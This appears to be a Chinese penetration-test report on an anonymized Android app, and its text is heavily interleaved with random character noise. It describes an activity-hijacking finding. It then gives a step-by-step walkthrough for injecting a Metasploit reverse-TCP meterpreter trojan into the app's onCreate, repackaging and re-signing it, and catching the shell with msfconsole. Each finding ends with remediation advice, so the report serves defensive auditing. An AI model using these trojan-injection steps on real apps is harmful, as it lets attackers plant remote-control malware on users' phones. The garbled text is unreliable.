0 g0 D8 f4 h" A: w2 \6 D9 o
- C8 Q! Q5 s* z+ e% ~2 C8 j
# I. b! V3 s7 n4 e t
! T8 l1 o x9 M8 w; }) f
8 h0 h* C. ~& v, j& `
' W' |; l2 G# W' {+ h* s; y
U n7 z8 z" J3 j! X1 c; m V! g0 d
- P/ y/ v2 A4 h* k4 t1 X9 g
; B3 [& {6 `0 l/ m+ B3 K6 B g v4 m |2 F2 |7 f- [, u, [
e" ?9 T. K! Y, o/ g+ ]; S$ H h8 C% \. I- Y
2 检测结果 3 [& W- I" k1 K# p1 N
0 e; g4 c2 O1 f' y8 R* B" k# ~4 ~
7 E/ a2 ]. b1 \1 X1 r0 @7 H
; I' ]8 g7 c: t0 Q7 m: l) [
1 J I( L. Z9 t; V" `8 F2 C6 G' q& m/ T: T% ~
2.1 某某某 $ d- w$ a8 q% E7 N+ O
( h1 X5 W% b' A3 s L# t
' {5 ?; Q+ M( Z+ ?
8 j) x3 ~# G' L
3 P) r5 m: G, U+ o8 U6 e# }$ D
) ?3 J4 l1 s+ z$ \; d+ \ U 2.1.1检测目标 / ?. i8 |6 z& E& z" ^
" \7 L: c; E! J0 |- G. Y4 |1 i! J
" U5 a' ]' Y5 R
/ W! m1 Y$ I0 ~, J9 z5 v) m n. N/ Q9 h* |3 ~& W
4 G6 M7 j. S4 [/ A E
目标地址: 某某某某某某APP
; J* E/ s8 i2 h% }. J- f T$ t
% C* |" R9 @: ?& e5 c& R, P3 `$ n& {6 g. }( O
' u; x6 P0 ]) ~. Q$ L, W) X( u( O1 ~7 x- x
2.1.2检测结果 2 j2 g, t+ g- _1 j* H2 X: k: `
- z, g( d; U, W' Z8 l: h% I: ~
7 E; N# z. z: C: Z8 X2 D+ R
; f& T/ U0 O9 W
0 f2 h6 j# _( j/ ^
3 z7 v" _- g1 j( G 2.1.2.1 2 m$ \. @& |2 v K
( ~, [ O% e1 e2 M0 X7 \- f
+ `3 E# M% o" _# ]1 w# ?' J. Y# i
8 R7 M& }9 D' a/ C5 [, Y8 G( C( v
6 [# R. A% ?+ }3 X. w, ~4 V& o& o3 ]: Y) M5 ~/ ]- V% i3 z
漏洞链接地址:某某某某某某APP
: F" l; ^5 `# [( u- q
/ S* s1 ^! F9 D. ^( ~0 _
( R1 l9 n9 T% L( k) @+ H; J7 Z! i: e
: \$ e# F& x |, y% x& C' [9 V
, K4 q: }: i& y# R# x% I1 ~' L
5 X1 [. X' x. q* F( b, W
* A T5 s5 \, N8 P5 w" I7 K
. m# M# F1 C& a9 _
G; t# _' j+ k* D& H m" g4 ] N3 ~* n1 v* Z
- z) _+ \7 s6 F- F0 S
0 w8 b( l1 l3 E1 \, @ 漏洞分析及取证:
6 l, Y1 I: z3 }& |8 y2 W: j" Y5 n3 l
. x' [4 M8 p. n. ^4 f: G) E9 M: F, _$ W7 s2 D, b3 ^0 t# C- [
2 Y) ~, f% H$ u h$ s* E- {5 G
, t1 Z' d/ u' _+ C H6 D2 L7 c
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 4 {) M5 {: l% S3 s! r
( v* ?9 W" [5 u; s2 R& u
5 R1 \; z0 u* _4 \! Y S6 ^
( f# Q% p% f- t: m4 r. ]
7 L+ i' l) O3 ? g1 f! y+ D4 w0 v/ J& P o8 x9 ]' z1 x4 E1 W
0 {0 S3 T3 P* O$ V! _( D2 y
* c0 K Z9 D% b4 {% ^
3 F' k F+ q4 d9 z9 D# Y5 T( C T1 w' Y0 H& g) g* ~
7 h. e9 X2 O3 z$ j$ f. T+ w
+ G8 Z* R/ R7 A* u% K, ^
9 V( G6 v* I3 U5 [8 w7 b* p G3 ^
# y9 {3 `9 a Q9 N( o" r
1 `7 S% y' b5 p! ] E' ]& y: l* n8 c; Q" u! ^% g5 T$ I" w
3 |" C0 y9 W0 f! q/ [% [
# Y) F0 x0 F5 |8 b
3 [% L* J8 U" M0 w- {' l
4 X7 k0 T. i7 ]" |3 u* n
0 A9 L5 i! b5 L% n% J$ A& ?3 E
$ i& z, H( D9 E5 @! w- D; ^9 c
5 p# @" s' X& f2 S/ }4 L
9 G7 Q( T" ]2 Y$ [2 ]
! w1 ^: s* R% {# O, x5 G0 T
7 m; o% H2 K9 U: g2 {3 K1 i
' O" J$ i3 h) x& Y7 X( t$ ?
6 K3 ^ d2 {1 E0 v w
5 t8 \5 [% t1 {9 b& B3 H: U! `/ g9 e% W
! ^& u, H4 T; x
% W" W( W0 J6 b! e( |" j7 b. q
5 P7 k9 J, e( T. l; i
) x; T. p7 x( K% S* J
" {8 M2 T+ g; L/ e. u! ]
3 I; l: L p) @6 a9 r
漏洞危害:高 1 D. e) G( ?6 i, d( ?1 h
5 \0 }" ]. o8 } y' T
) q' \. k1 e/ L# I0 ]
+ e$ y L+ ~& q! z) W7 M) N) Q, b
* {% t$ H5 [3 N3 {5 N3 i3 L2 Z3 h: u4 m X0 a" c: r
/ ?- j: e- C: T9 k3 |$ B- O! r4 Y8 v; A; b$ d
; }1 W6 a4 t/ x
9 ^* e3 z$ i3 ~& C/ M
4 k7 D* _5 L0 Y& W8 t, U
, W+ [" a n& |6 ~ 5 `# i! \9 Z; t/ K7 }
+ n& o! p6 \, w" H2 I3 q1 \
) b4 U% T8 V0 x: Y" h% f g" W0 e
, e, N' |2 \# s 严重程度 8 ^' _4 E3 ]8 A( D
) Y% ^( B6 n9 n( W0 Y2 I
* W: S( V6 ~, l4 T) m; L% F( k. V0 H1 A9 _' r1 ~
|
* i5 t" W3 [ j8 C' [% z1 c4 A
* ^' A6 o; ^6 n" ?* [3 o0 f( D 4 i: Z8 |, I$ q- Q" a4 Z# x/ V
& J( {) {/ x1 c$ c' ?7 a' \ y
( y2 R& \7 G' \$ M. _+ T; E1 C2 c6 d. }' }6 i+ a" r# p* T# c
高
( N. g' @$ C; h
- X; C3 r h6 f, w* _6 h
) P8 b3 `4 F ?
5 T) Y+ ^, a' N0 r' X1 W4 ?: w8 v! ^0 B | 6 V$ v2 M3 q2 d9 E" A9 P! L
1 [+ J* }8 z/ C" M! x * C1 d$ U* t( f5 a) ~, n) X
8 b' w( ?' c1 h" m
. ?4 I8 ~8 r" J4 V/ ~
+ V) B9 K& p% {4 W ■
k. O5 K- v- @* [, a4 _) m/ U
9 w/ f+ ^8 P# V B# ^- V- l - H( p9 n" k4 v# f5 n
" R! C6 ^* M& K$ [: _' t/ \ | : m) p" b$ Q! T; k% `0 h5 K
3 n6 m' F4 t. j: x) Y% H
* @/ B# A* g& m( H; [
/ E0 }! Y: M. {, ?+ u& p. z5 h* O
" y/ b; w6 [, f$ y1 i7 i
: }2 y* i# m% h$ Z& c. z) s 中 5 D# M3 {, C+ K5 X
; p8 k: u" O; |9 d3 J ' y3 \* A. m3 D" F# ?2 V
+ t( K, R9 x6 T | 9 Q/ a, M. g+ K# C; m& l( [2 o
{! _: O5 O w* Z; I* l! b
! T, D0 N O: [# n1 z5 F& N8 S* [+ ?* [" m8 w f$ R9 a% i
! R) ^( F3 ?& P0 p* Q) {3 E
; F& U' a" n: U3 a7 l* ]; P( {- F$ s T
4 f. O( n# B& q: R
9 M( G- P/ c+ {: z$ T! x! J
2 r0 G+ y0 G" Z/ i U
( L* G/ D" S, \% ^5 }
| 9 X/ N* R# B; n b. b2 p& ^
' _7 K3 T2 C$ S3 X$ i! L
4 {5 d% w% ~+ }$ b% H+ k7 k0 j
0 f6 O0 \+ M( C7 w/ v V
; A/ F! f, G7 ~! {$ ~4 c. a3 R! `5 d9 h2 q9 e9 @- a
低 7 d4 v2 h& g0 e& p/ H
/ M+ e$ t* |# J7 S3 L& s/ r7 ^
* o: }9 ~3 m" l3 D$ F# |% r8 n6 _8 ^
|
' q g- \" @: g M0 l# m+ e. W3 Y6 E, H8 v0 }* _8 ]
|8 v$ s$ I* w* G9 N5 `2 G- T
# l$ K. \! M; g- h
$ W- B# j7 U$ |) |
* P H4 t' U/ V- }; ?# o 2 |0 B0 e8 q0 z/ S+ f# P
, D, i3 Y6 y% h9 s5 E7 x& _6 c* X: L0 U
, F! U4 S- ]1 ]9 z. a/ ]9 m7 c) u% B
! x d- f' A& \6 D+ y; y3 o | 8 U' D. E6 y0 [! I" s0 Q* D
& T. n8 `; |: R* @2 _& J) D
, H* H. X N w. k X3 r, j& I- U& [ J( \! }# A. ^# o0 E9 ?
, |% v- G8 F1 E6 u( n
* v) z# c5 ~0 E+ Y( @8 w$ ?2 x; R+ Q
" H0 X0 X8 M. e3 N8 S5 Z% P
5 `+ X. s% z, z3 V. b
: h4 d/ s. D$ i' J" ~2 L$ J3 g y( q3 d# ~9 s1 `& b
( [# Z+ O( q! o- q8 f/ {
' r8 w4 w* \' ^3 m) \
+ ?$ `- E) O/ q6 T+ i8 I+ Z9 X5 ]! D) @1 o+ J% H: Y
6 ]& l0 d4 a$ A" y' c, g" Q
4 T! ?& E0 b' O# j * K0 F) X1 t D3 f3 J, C
2 E1 h5 K% _5 Z6 M5 \3 i
修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 3 u; B5 }6 [' M
, P0 @8 Z) |2 d
) W) w, v9 i& b
0 m x. A3 p7 w6 B* Z0 C - Y5 H. Z6 e M1 n' r( w
! Q( @" D7 s# n" @8 \
) j e/ M6 X+ \: E$ ?$ J7 m" T, d9 P' o
' c- O- P, h1 s% A! v, i$ M- ^6 v. k3 D1 b
! O0 v$ m6 k W4 _1 p7 n
# [; ?# z$ m; B
0 ? s0 Y5 X" V$ s2 k( z- n( }3 ?
( J6 @% d/ p0 {9 W; b4 d O8 Q6 a7 _3 [! N5 ]% f2 F
) ]7 D2 l! c1 S; n. c0 [+ W9 v
6 G( r0 v$ l+ J2 h. v8 _: D7 ] , }4 p6 J6 S; i% L
+ |: u5 R# C ?: R
2.1.2.2
8 w6 H/ D( p5 H$ w
6 M ^4 G, N' S& D% b3 D7 A* S( [
$ t& [7 }) P! G ^ [
# s. @" j) ]! e: c8 \# o 6 i; c; |) N1 h; L# a9 Z
4 s- y, Q2 s8 }8 _5 [ 漏洞链接地址:某某某某某某APP , c5 F7 H- i( m1 `3 s
( q7 C0 @4 ^7 R: ^& o( X6 c
% U) U' g1 h# W$ k
4 y& U, G3 T% o" a$ e
7 q2 j" ~$ P" Z0 t9 ~8 U
* B5 e3 ~6 t B' d( F 漏洞分析及取证: 3 P0 q9 S# g$ N0 I3 d- }, f
% v* ^# a7 \+ H7 X
1 f @. g5 W) u4 V& d. g% K: X3 V
) }3 \& D$ e) t e8 s
8 B. U# z/ T* q- ]+ V: Q/ O/ J3 F E7 c1 d, E, j0 M4 T
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
6 K$ E! X1 {. L% G
3 ]# p% ^' d+ } I/ M
. |6 N. B$ p* r: K2 ^% o4 y) t5 ^
. ^0 D7 R% P' K( ] 5 S9 v& b" h! w, l8 F$ ]; R5 A
+ c5 ~" g2 f4 K3 m% K m
用Metasploit 生成木马 apk * C% t2 U* ?4 I+ B3 O% A- r
1 m6 c0 c7 y; X; ] q
7 b* `# J' G2 z" T6 Q, X7 z
" `2 P7 c! @, k* A# l0 }
; ?: W% r% Q+ C8 O$ Z8 n* s! `% k( h% Q. v* K
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk ( |/ L0 d4 N* O6 U f
6 Q$ S5 }: a; e( c3 ]. j0 }
: s5 F& ]3 q( q- ]$ Q1 |
' A8 V( U" S- X- _, M7 M
( @1 c( q& }- V3 ^
3 _/ S* a5 M, i
反编译目标apk和木马apk 3 E0 |' `% {0 |" i2 N
; h$ J! W- i" K
4 A$ ^4 X: a) I6 h! V( f# a9 c9 s
7 z0 j' [& K) q. X# p
$ w- l8 X. J, R3 d* v, |2 T2 y
apktool d target.apk
& _# K) p! G$ x! k% z
) |, g" `. O+ x6 s- m
apktool d cockhorse.apk ( j, T; c6 L, s
* U( @ z1 `& m4 M N8 c$ A
/ P0 n0 L; [" L, p! |6 r2 H. p$ P* X/ F2 D- a( D
$ P# |4 q- x. d q: w/ W% `: v( L7 W- j' y9 Z. s
木马 apk 注入目标 apk 3 r5 N/ ]" O7 J1 A5 Z. A# U
" l* f4 m& @$ y
/ V: g( v' N6 h
, A! o+ d, S7 n* g. N6 j
5 _8 a- E$ g8 J4 j) I' i
" [1 Z/ b" C1 d* o 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
& m( i; p- i& I. p
5 ]" h3 K5 J- [ v, p0 E
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 3 y6 C. J! e( O) G6 Q3 E+ K
+ m0 U9 S8 Q& c
; U( U. p, @3 d, R5 ~5 @/ U
2 a9 z H0 ^! }6 e; Z; Z
) ~0 _- [& v9 j1 @' y
/ Y1 V& c9 W7 e* U' v0 J8 X 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ! ^ @2 q" [- ?& h
! h: G! R/ J0 f+ p* H1 l# b1 v
. E) \. W% X% b5 l8 m+ f! ]
( V, b' X, {: i- i
: v- j' z; j4 X7 q0 k$ N8 I# k7 d
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 % `3 I% Z1 R& m
2 O, \# Z* n( I7 y5 L
8 c/ c" t$ _( I/ x
; J r8 D, l" w4 E5 `/ L- w3 c
% z0 @! [/ W8 Y0 N, _5 X
# m- D, j% Q F9 }1 Q 回编译生成最终 apk 6 N: k. l' h, k4 o; o
1 O6 _0 u( z1 R N
" `4 K O0 z, l. @
1 x4 v8 B$ d: n4 t6 N; b9 R) Y
C' X0 f* |9 \: r& p- }( ^
& f% S0 F K4 d! q/ X 重新打包
$ [! w9 V3 M( u, V
. z" D8 j4 ]: y( K; h: i
6 ?) {+ M$ y1 _' |5 O0 P* b
3 R4 _* K( I" o* C+ o
( r7 U6 R. b+ k7 k" L! U$ a- `* }& e! A5 x$ c( `, K
apktool b -o repackage.apk target_app_floder
2 N- ?* c/ A) b, Q* W+ A3 w. g, O: n! v h& _: h H
! l9 g5 o- H) C! ~5 L6 }
# i! ^8 q- \ w3 ^
: W9 b: u: w# q9 b" z ~6 ~; e- f4 e0 T8 c1 B0 g! _
创建签名文件,有的话可忽略此步骤 : n8 }7 ^+ m k: a, k& l
$ l6 E. _% z$ }
' G- q$ u; }! F6 P. b [
, g3 O- x8 z. g" c- z: t6 E
1 d$ A0 B1 A3 ^! q- ?3 }
, y+ f# {* N5 L, q
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 5 s' j6 z& A( p8 c
9 V6 H+ x. N6 r1 K. L. u. Y7 \
! u! S3 q R% i& W8 B$ d
% S0 p3 ~6 m F5 N) Q) v
, X" o% P( B8 u6 {; }8 a8 v# p7 G: D$ R! N+ G, p9 r1 ^$ i
签名,以下任选其一
8 g( c4 o- {- a6 L- v; j, ^: V2 P
' N. O) r3 }9 O) ?' \ f% b r
9 o9 L4 O& g1 r: c- { e & R: L+ O! x& ?
& {- j1 S( {2 K5 C" O* _7 w" ?- f jarsigner 方式
3 t5 X m3 M# |& a! P+ m
, C7 c+ c- l' D% ~
+ n2 P& k- k* O3 F8 @# E( ^- H; `- _
7 w) U; o+ g6 l* n! a
' @* c. b6 ?: r3 w* C6 z+ i. f% u- L* o
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ( d# N$ `' Q, c& w+ m
5 R. D$ O4 H! F% D- j
% l5 Q5 Z/ c9 j, L! R$ t: V2 D" x+ ]! }* H
, T& |9 I- Q7 U$ {4 N7 x
' M4 l4 b& u( _0 H; o* E. } apksigner 方式 4 [0 p! [" C6 k* F) o
( Y4 o3 ]6 y& B6 N
9 @9 U! B" r/ }1 D- p! P! N7 X1 E0 [( N; \, Y
; R7 I1 h6 f1 i; f l3 [
( h: P; H6 v& X' T apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk " L) g' V2 A9 u: D+ f5 T
1 Q/ |' r' m( T9 a; `3 ^5 T T
7 U. E& K2 H" U3 H0 G4 P7 d
6 V: n0 g" S4 a4 S) l ( h+ z' g6 \" X! c
- ?0 z4 W2 M7 f a6 D 如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 {2 ]+ S6 U- o/ I" h+ S, T7 w$ ~
( e; O6 v0 X! v V: y( g
, K9 J$ n0 G8 v3 T+ F
% L, D' m8 f) b. T
& s1 Z5 t2 z( t' C. r% N8 k1 k7 g$ O9 g! L
验证,以下任选其一
4 R- X4 B) s- j- ~+ _/ ? g9 @2 r
5 e, J( z% x. H5 y) m& I" ^+ w2 [
, ?% s; P; B1 ?; b3 i9 q# u, {' I% F# P: H ?8 V# I% j4 K& H
: F! E( B! K# D3 i& w) Y1 p/ O3 u& m( f2 W& R) R8 e# Z
jarsigner方式
) ~ h" U/ d# z* P* M/ O
7 {1 b( s; P6 `) _
5 ?: P& R& S1 `0 x3 n( o
$ l( l* i! ^# P4 V
# h' N2 W) W' R: [7 @% J3 R- J8 c3 I/ s- D6 Q5 y$ l4 r
jarsigner -verify repackaged.apk
s9 Z, D9 R3 J9 w( }0 v$ }! c( F. M, Z, K
; v) ?# j4 ^) e4 Y! p9 @7 V
/ q: I( S4 ~9 Q1 k
- p9 ^. a/ _( c- T+ i" C% j( f: I! W" Q' `3 w- ?
apksigner 方式 7 R/ L3 o0 P+ q1 L6 b
6 }0 f$ {" X% W7 ?# ?; B4 ]* u; }
. X$ X7 Q7 d/ u
; s( i, k3 L' P2 W3 ?, U; c. e 4 H5 [- u8 X' |: R+ K2 t% E! x
6 e0 z+ t y% K1 C6 [" A @ apksigner verify -v --print-certs repackaged.apk
8 e( Z! C# O" W: p- s7 X9 [% T" \0 {8 T* }- G
, N7 q, U5 B) A, r4 \6 z8 y, Z9 i9 l: ]: }3 K- {1 r
& {% V1 X, H/ R$ \6 @* U6 P$ d8 N W; f7 e( f- v& l: ]6 r
keytool方式 9 h# [/ B& V( |8 ^& E0 y3 H5 N
8 C ]- ?5 D; H# L. E4 y% q
' y4 z7 h1 Z& R7 p6 n- m+ e5 w$ ]
0 y& H% ?& Q* q: \
. ^1 n) \# {6 Y7 x, b3 l0 |* ?8 H" n2 Q. }: K( d
keytool -printcert -jarfile repackaged.apk & Z1 g( |# `" O' {) M, h
+ M' M4 K& ]/ Z( @0 S
. X; u; U0 P0 w8 w- J3 z1 \- C% \; |% M4 o8 e# R1 T$ u' }& L
; z" y+ Q2 Q' j' E6 `" Q
) b L* S* k% m3 H, D2 x
对齐 " j$ f3 N5 M7 }3 f, l1 x9 G
1 [# G- U/ z. `9 z5 B$ ~
! w$ q2 I- r8 w6 T* ~
+ q- g. s0 J" }9 N7 u& O $ L& o; k- i5 S! j
9 p) m. J9 a+ U. i% q 字节对齐优化 ; g! |) [" U; B* g
1 W6 V1 M& ]8 c" T$ z& F
) q- L" d, o2 g K
$ m" j. G. }1 g
, [! d& C- Q9 Y5 o% }9 x# U2 t/ `5 o) `( |3 e0 X8 ]! P5 L# E* r
zipalign -v 4 repackaged.apk final.apk
; H4 Z* W4 ?$ G# l; X% u6 `' H6 l- a7 _ j" ^
( G9 [5 X( A0 W( s b, p6 Q6 B" j( J |( _+ q5 x3 v" g
! [# ]+ z7 t* S2 w }" v
0 E, |) t- S9 h+ }5 K 检查是否对齐
+ @2 j% t( L# Q8 D7 A& M
9 _: t8 q4 J# m' f0 ^
7 {8 s% J/ K0 C* z: _7 ?. u9 G3 b
6 }8 O! X2 T& j$ \
: ]' v: S- @4 |' X
zipalign -c -v 4 final.apk " x" G+ ^2 o6 A9 i
" x2 X e- k+ E4 X
$ I8 b& w/ c5 i" t6 L+ g+ y( I
1 Q8 m6 j8 r% y6 a2 g+ Q- b $ a4 T0 N! g& Z2 ~' ^# J
' c# f6 S6 e' J* S z 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
- R' Q* R( q! _9 {1 Y' A5 |' a7 {- y9 q
' f; t( p$ V9 d# A5 a9 u
: t" ^" N# n# n2 B! A# N. w# b
; ~ E' _6 E, ~ , F. D! A* [; h$ V
2 X0 V# ~8 }! d. ^8 G0 j 启动Metasploit控制台,配置参数等待上线 + ^3 s# ^/ n% t
4 V, r/ s& F3 z" x5 E/ M z
* o ]& z( n1 w- }4 K" B
. S$ R6 J9 ?( [2 N5 \
j( J/ s( I1 C' f) N5 J- g- x* `5 y0 `# n
在终端依次输入如下命令 + a. [. m4 u8 E/ a& O; s4 f
* y# {9 w: o: k
6 O0 H, @" F2 E, P) m
$ f: }6 j7 M' \7 b % w: Z4 W2 T! D: T$ S( G
- G9 e0 p! U/ Q: P" @ msfconsole 5 D: _! X2 G, I' o# ?: I/ |
6 y- o0 q5 s4 [1 I5 T* k% N
$ R- U; i! c8 H# \+ W2 U# M3 q) p
I/ G! G$ n" j, `7 [1 t
k4 Q& G; i, }6 K/ ~( { use exploit/multi/handler 8 [6 Z% z: x1 Y a- G* t) V
5 G. d4 F9 y( e+ p% _5 D
8 p' s( l* i0 V3 @; {
1 M2 ] X- z: L% j# |9 D5 k
. F( A" [' z' a0 `
3 ^" ] |6 R& X) X set PAYLOAD android/meterpreter/reverse_tcp $ K. {1 l9 e! g+ O# u
6 s: L5 z, r0 Q4 }/ G4 D D
& m% j0 W2 G( \0 W9 ?5 `% k$ P5 J+ h: y3 n1 G5 k- q& S
% m3 @5 B! m8 B' M) S, S" Z
3 d1 t- J1 a! p' V
set LHOST 192.xxx.xx.xx ! E0 t: n+ }6 v/ E
4 v" o9 P1 f9 u) k0 |
, `' K6 ~ X9 [5 U, m2 K' Z
& |: I, j# e- {9 c1 Q5 K# a+ I* L
# Q5 W: I6 j. g1 a7 u g! x7 I
. }: _- g9 r' t% D D$ l; u% u# y/ P set LPORT 4444
9 Q" E/ C V' N! e ~- D& Y$ @
1 z$ Q9 O5 Z' }2 r+ J! `7 q
6 o0 G6 h# s' b3 G
: g* v7 w I3 G" A2 Q2 p
! b% D5 X; E3 ^# Q' ^. w6 s m exploit
8 ] j: K1 h2 ]3 ?
8 V1 `9 T- w- v/ u
: {1 V2 d, `$ o$ u& O4 \2 c
) \* I, j; k. X7 A+ _' [ ~: r f) M' W$ v E# c5 b
, `3 R. U- U; S% R" F$ P& \
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
/ t6 n1 w) s- d4 p5 _, z7 B
: E7 Z& [4 m/ e- ?! i' _
% ?; @# m. _. h( D( J, z/ L
& o$ L X! q' e& o
% T" v' ?9 P9 w9 l3 W
4 D8 I/ s0 p- G" Y ]; z 漏洞危害:中
- g1 b( y+ L* o) I
# [/ D t. {* U; d3 [% }# s. Q5 [
) L/ A5 G* K- g: }/ Z4 \) M6 A' S! Y% C( O- g9 \/ B8 O! v* j
0 G* { Z' |0 ]/ G+ ?9 z5 p- f a
& |5 m, \# }' Q) L) r! z+ v
- L4 [; ]3 d8 Q# P4 U1 u
: x2 M7 W- y! F- Y5 U j( b- S+ z! q+ k: y0 n& \3 V- N8 G: p
) r6 R* L/ \* s1 n# ` @8 [
7 H, d% W1 H8 t) p6 }& S
D' e% G0 U# M9 G- R
( F) z3 b3 j/ ^( S+ P M) p( s
- i2 q1 R% J; i
* H5 g9 g6 u3 W6 m: s! K
; y) L# i: ?, l$ h$ I& T9 {! S2 J* x$ n- @
严重程度
+ a' e/ ?* a/ z! S8 v2 s* H* j; F
( Q! ~' T( H2 Z3 {
Q3 b$ h7 x3 [) }
| & @9 T( U) \7 C( [& f3 F. m4 n. K
0 x3 K+ L1 L% P' G+ S* y. P
- V# W. F) H3 l- c' F5 \
" \' O# [1 Y" E0 s* n 5 t( ]2 ~$ t8 I4 Q* c( \9 J
8 l" \1 m& U2 z, m; J8 [4 z 高 ; F; w: I# u ?; s' h: I" v
1 P2 a# Z4 }: v% \/ s# e! ^ Y% ~
% h p* @4 b8 Y, R# |
7 g3 q6 c( ?1 R | ' H+ ?# i/ X/ o o. O
5 w7 q Q' N% N _
1 e* F5 m) o/ Z5 g
! x1 ~0 |+ g& U5 v/ Y7 I* @+ o 4 D' M; g: n5 }/ K1 t- o
C/ p( I" B5 B
■
! q' {1 D6 o4 B& E5 `! b- k
: h+ D y1 ]) E) a! j 6 a5 P5 @! m! c! g9 X _# j+ J) Y
3 @0 V0 K( y( T4 S) ]! O4 |, Z- D4 H
| : V: r9 ~# A. {9 u) M
( |+ ~2 U0 o9 \4 T7 O
% g7 u( e/ q8 R1 {1 K/ v+ q# p2 {0 r# T+ r3 @5 m& o
/ ~: o) e$ I" }- Z, H) `4 |/ E7 k$ D
中
& w: H: d" Z- B0 ]+ a) u
3 Y0 q0 y( t: A" R* v+ y
; y) b& Z2 F+ B0 @: a# {, O3 y n
Z% ^2 i& O- d7 Q | 7 \' T! D5 w* h. {' O* k8 b/ h
& Y6 Y7 O& S/ G0 m' g# o 7 s: } T5 c. M6 G; o) o
/ e7 y+ w' N, t. O( { q9 v/ n1 l5 R* Z7 o& u' o
0 q$ m! N/ C! l/ B$ b
; O: B6 N$ E0 K, A! A+ [
2 K- A% K" B9 K3 R! r& O1 n
0 j7 F. Z, A9 S" o3 b" q
; m$ ]9 o# J9 S5 P8 u" Z6 J
7 q( \0 ^3 X4 H. B" i) |# b* y1 S# @% ?2 k- W K
| + `; X9 O$ U1 x, ^, c
z% N- i/ Y7 j9 K1 B
& F& e2 F% M9 J; K' |
! n& I! }* z' _, y 4 [! N: I) [# j# c
, B: x$ @( S8 D# a3 _3 Z 低
: E. c6 Y6 a# f/ o2 M3 ?0 L* u3 h1 y& ]* c/ j( g; ?% H
( w) q. g! B% i+ h: Q; Z3 q" ]3 X" y& f4 J3 f# ]% L6 w. r
|
9 v2 d8 _9 R$ Y; ^ j% F5 [, ?2 Z Q7 W5 f6 j
9 i$ e# J* ^; r+ d& t
- }* q, P0 t+ s+ Q$ H9 p7 F, D
% @3 M" X) _- N" S& C# L. o& B) y% q0 s6 S# x
/ s5 P7 `$ E' @, _! ^+ X0 j: x. {0 q) j* b' m& T- s- g
' N! ]* T; e' i9 N( k: ^6 D5 N1 A8 O, U \. B# A1 S! o3 ^
/ |3 f3 l5 H# s4 D% f" r
% ?3 I0 m3 Y1 U0 M
|
' i5 k" Y" ]% S( N
v% o* c. L- r9 X, a G2 h
6 U0 B8 S! h2 z+ W- M) a; V
2 o L) K; t: P; ~8 t3 Z
8 C9 `# M4 L# V u
& B: a$ V- `& z+ y
' |- n+ A% A( T/ j8 }0 R' [0 B
: I+ p% K& B% I3 B3 `1 ?7 ]
0 h3 d: p$ L$ X8 i; p7 j8 @
5 x% G6 M4 ^! ` B8 k 0 w, M5 |" @; ~% T
. H* Q y- o+ \$ Y ( o, C/ O5 {3 w2 m3 \$ r J4 `" u. q- ]
( ]5 s! a2 Z- h3 {! ^
$ D0 l6 N( J4 h/ ]0 W
' S2 l8 s" u% d
% i0 d- @; v; O f
2 E6 i! B" P0 O 修复方法: ' e3 M3 H+ Q: n. P5 b1 d8 a
; d: B: u! Q, g$ x0 r, n& p; @, l% c
- B: p* l J+ J1 L
8 H) W% ~5 w( n' q; d, k6 f
5 V( s' x+ A d, C
! X* q/ x2 c, |$ \ 1.在 APP 启动时应做签名校验防止二次打包。
* X' P4 x4 T6 ]8 ]7 L
7 G7 q' W0 n6 o, }( d& C7 b 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ; Z4 `/ L2 S ?+ N* z1 ?
0 @% x$ X: U5 ^+ p" z
- k# \' d3 W/ N6 _) A3 e$ f
5 N2 Z2 `6 F6 C9 V
& F y4 z( F* T- ]8 T
/ k( T3 r" g6 H! k K 8 c# k/ ], }/ {: N
) u$ ]% N5 M% V - j$ e! c) o h: N; `; G9 k
( u! ~- p! A" n! U* [! |+ F
9 V3 ?8 s( T2 e7 A! r, l
( T9 F8 R4 S/ A/ _/ Y) y0 S
% U+ c# K: \# ]' N6 u: d! m$ z/ Y0 L4 O8 ]7 p6 n7 T
/ b2 P8 b% K) Y' |) F+ P4 u
/ P0 S: `9 z" I' z" ?, ?
4 I J9 R0 c0 W' K% @7 F1 y- a: L# ] T' k
% ?. e+ O9 Q- X% G
7 P. O9 c- F% p/ |% n